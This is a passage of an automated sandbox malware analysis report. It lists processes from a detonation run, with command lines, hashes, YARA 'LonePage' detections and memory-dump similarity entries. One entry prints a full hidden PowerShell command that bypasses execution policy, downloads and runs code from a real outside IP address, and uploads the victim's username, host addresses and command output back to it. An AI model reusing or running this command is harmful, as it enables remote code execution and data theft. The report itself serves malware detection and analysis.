                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:09:41:15
                                                                      Start date:30/09/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1728,i,12702411498753033684,7387674129069318371,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                      Imagebase:0x7ff6413e0000
                                                                      File size:3'581'912 bytes
                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:15
                                                                      Start time:09:45:01
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs"
                                                                      Imagebase:0x7ff635960000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000F.00000002.4358131758.00000245D7680000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000F.00000002.4358131758.00000245D7686000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000F.00000002.4358131758.00000245D76C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000F.00000002.4358273831.00000245D7825000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000F.00000002.4358131758.00000245D76DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:16
                                                                      Start time:09:45:01
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.4545241066.00000107F6460000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.4545241066.00000107F64F2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.4521422067.000001078019C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:17
                                                                      Start time:09:45:01
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2126769549.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3dd856ec6629a9ad3253283359d6c2a881ec7a1311ff8ffeb1e483423fcff176
                                                                        • Instruction ID: 4f6d13a1e641f644b83a0d5b89e1e045fb9419d8f6b4001dfd04de57bab85d14
                                                                        • Opcode Fuzzy Hash: 3dd856ec6629a9ad3253283359d6c2a881ec7a1311ff8ffeb1e483423fcff176
                                                                        • Instruction Fuzzy Hash: FF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661D736E882CB45
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3477802799.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848f20000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a8a9c365174f43c5101b744ac5d7b3b9aaf51b14daf0b5a7e7581b6fe0d30c84
                                                                        • Instruction ID: 6512173439e5eb0e14bd885c75719f9b620c11a06acdb36a04cf4bae5588a347
                                                                        • Opcode Fuzzy Hash: a8a9c365174f43c5101b744ac5d7b3b9aaf51b14daf0b5a7e7581b6fe0d30c84
                                                                        • Instruction Fuzzy Hash: A0223432D0EACA4FE796AB7868151B57BE0EF463A4F0801FAD44CC70D3DE19A8458359
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3477802799.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848f20000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d2ecaa307169e16f609a0c04158eae3064fecea35af98f01ac1b365eb4a4d67
                                                                        • Instruction ID: 5969f8586bcf877a6466e035960319826486d0d6bc9bd7c64d68c517342f6f62
                                                                        • Opcode Fuzzy Hash: 0d2ecaa307169e16f609a0c04158eae3064fecea35af98f01ac1b365eb4a4d67
                                                                        • Instruction Fuzzy Hash: 45D14371E0EA8A5FE795BB2C68555B97BE0FF16390F0801FAD00CC70E3DA19A805C756
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3477802799.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848f20000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 30b86ee0387603f06c104aee4eb816dcd1f265d14aef37c782a90134f4b95b61
                                                                        • Instruction ID: 7c26f298826765c20cbdb8a6807d700516094f8cd90ec6f85679ef2ebdd0eb52
                                                                        • Opcode Fuzzy Hash: 30b86ee0387603f06c104aee4eb816dcd1f265d14aef37c782a90134f4b95b61
                                                                        • Instruction Fuzzy Hash: DF31C033E1FE965FF6A9B76C246527865D0EF812E4F4800BAE81DC31D3DE0E5C844259
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3477232328.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848e50000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                        • Instruction ID: 0b9f109908e78bfd273596d1c677c9a80c13075b22e165c5df6a322a69224a52
                                                                        • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                        • Instruction Fuzzy Hash: 7301677111CB0C4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3651DB36E881CB45